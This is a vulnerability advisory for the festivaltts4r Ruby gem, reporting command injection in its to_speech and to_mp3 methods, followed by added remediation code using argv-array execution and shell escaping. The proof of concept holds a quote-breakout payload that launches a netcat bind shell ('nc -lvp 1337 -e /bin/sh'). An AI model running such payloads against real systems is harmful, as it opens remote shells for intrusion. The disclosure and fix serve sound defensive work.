The `to_speech` and `to_mp3` methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.
Proof of concept:
```ruby
#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"

# The receiver string closes the quoted shell argument, runs an injected command, then re-opens the quote.
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
```

```
$ ./asdf.rb
listening on [any] 1337 ...
```
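The root cause the report describes is caller-supplied text reaching a shell as part of a command string. The following is an added example (not the festivaltts4r gem's own code, whose internals are not shown on this page) of a wrapper that avoids the defect: the command is an argv array executed without a shell and the text is delivered over stdin, so quotes and `;` arrive as literal bytes. The `festival --tts` invocation and the function names are assumptions for illustration; a `Shellwords.escape` variant is included for the case where a shell pipeline cannot be avoided.

```ruby
#!/usr/bin/env ruby
# Added example (not festivaltts4r's code): text-to-speech without shell interpolation.
require "open3"
require "shellwords"

# Hypothetical command; the gem's actual invocation is not shown on the page.
FESTIVAL_TTS = ["festival", "--tts"].freeze

# Run `command` (an argv array, spawned directly, no shell) with `text` on stdin.
# Returns [stdout, exit_status]. Shell metacharacters in `text` are never parsed.
def speak_text(text, command: FESTIVAL_TTS)
  out, status = Open3.capture2(*command, stdin_data: text)
  [out, status.exitstatus]
end

# Fallback for a shell pipeline: quote the text so the shell sees exactly one word.
# Returns the command string; it is built but not executed here.
def shell_safe_command(text)
  "echo #{Shellwords.escape(text)} | festival --tts"
end

# Constructed sample input in the shape of the report's proof of concept
# (quote-breakout plus a second command), used only as data.
SAMPLE = %q{";echo "pwned}

if __FILE__ == $0
  # Stand-in for festival so the demo runs anywhere: cat echoes stdin unchanged.
  out, _code = speak_text(SAMPLE, command: ["cat"])
  puts out                         # the metacharacters come back as plain text
  puts shell_safe_command(SAMPLE)  # the text is a single quoted word in the pipeline
end
```

`Open3.capture2` with a multi-element argv bypasses `/bin/sh` entirely; the escaped fallback is weaker because it still trusts the shell's quoting rules, so prefer the argv form whenever the target program can read its input from stdin or a file.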